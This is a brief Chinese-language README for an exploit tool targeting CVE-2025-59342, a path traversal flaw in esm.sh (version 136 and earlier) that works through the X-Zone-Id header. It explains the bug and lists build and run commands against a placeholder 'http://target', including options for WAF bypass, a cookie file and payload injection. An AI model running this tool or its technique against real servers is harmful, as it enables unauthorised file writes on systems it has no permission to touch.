作者:Byte Reaper
CVE-2025-59342 是 esm.sh(一个用于现代 Web 开发的无构建内容分发网络 (CDN))中存在于版本 136 及更早版本中的一个路径遍历漏洞。
该问题存在于对 X-Zone-Id HTTP 头的处理中,该头部用于构建文件系统路径。该头部的值未经过适当的规范化或限制在应用程序的存储基目录内。
因此,在 X-Zone-Id 中提供 ../ 序列可能导致文件被写入预期的存储位置之外。
Linux x86_64
GCC
gcc exploit.c argparse.c -o CVE-2025-59342 -lcurl
./CVE-2025-59342 -u http://target (auto port = 80)
- Verbose Mode :
./CVE-2025-59342 -u http://target -v
- Bypass WAF :
./CVE-2025-59342 -u http://target -v -b
- Cookies FILE :
./CVE-2025-59342 -u http://target -c [FILE] -v
- Target Port server :
./CVE-2025-59342 -u http://target -p [PORT]
- Payload :
./CVE-2025-59342 -u http://target -p [Payload injection]
MIT